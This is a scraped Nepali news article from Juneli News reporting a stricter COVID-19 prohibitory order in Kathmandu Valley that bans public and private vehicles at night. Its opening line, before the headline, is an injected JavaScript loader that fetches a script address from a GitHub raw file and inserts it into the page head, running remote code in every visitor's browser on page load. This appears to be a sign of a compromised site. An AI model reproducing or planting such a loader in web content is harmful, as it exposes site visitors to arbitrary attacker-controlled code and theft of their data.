;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); उपत्यकामा निषेधाज्ञा कडा सार्वजनिक तथा निजी सवारी साधन सञ्चालनमा रोक – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • उपत्यकामा निषेधाज्ञा कडा सार्वजनिक तथा निजी सवारी साधन सञ्चालनमा रोक
Breaking News

उपत्यकामा निषेधाज्ञा कडा सार्वजनिक तथा निजी सवारी साधन सञ्चालनमा रोक

जुनेली न्यूज, काठमाडौं । पछिल्लो समय पुन: काठमाडौं उपत्यकामा कोरोना संक्रमणको दर बढेको छ । नोवेल  कोरोना भाइरस (कोभिड-१९)को जोखिम बढेपछि निषेधाज्ञालाई केही कडा बनाएर राति ८ बजेपछि सार्वजनिक तथा निजी तथा  सवारी साधन सञ्चालनमा रोक लगाइएको छ

आज बिहीबारदेखि काठमाडौं उपत्यकामा रातिको समयमा सवारी साधन सञ्चालन गर्न नपाइने र यो नियम भदौ ८ गतेसम्म लागू हुनेछ ।

काठमाडौं उपत्यकाका प्रमुख जिल्ला अधिकारीहरुको निर्णय अनुसार रातको समयमा अत्यावश्यकबाहेकका सवारी साधन सञ्चालन गर्न पाइने छैन ।

निर्माण सामग्री ढुवानीका लागि भने  राति ९ बजेदेखि बिहान ५ बजेसम्म सवारी साधन सञ्चालन गर्न भनिएको छ ।

फेसबुक प्रतिक्रियाहरु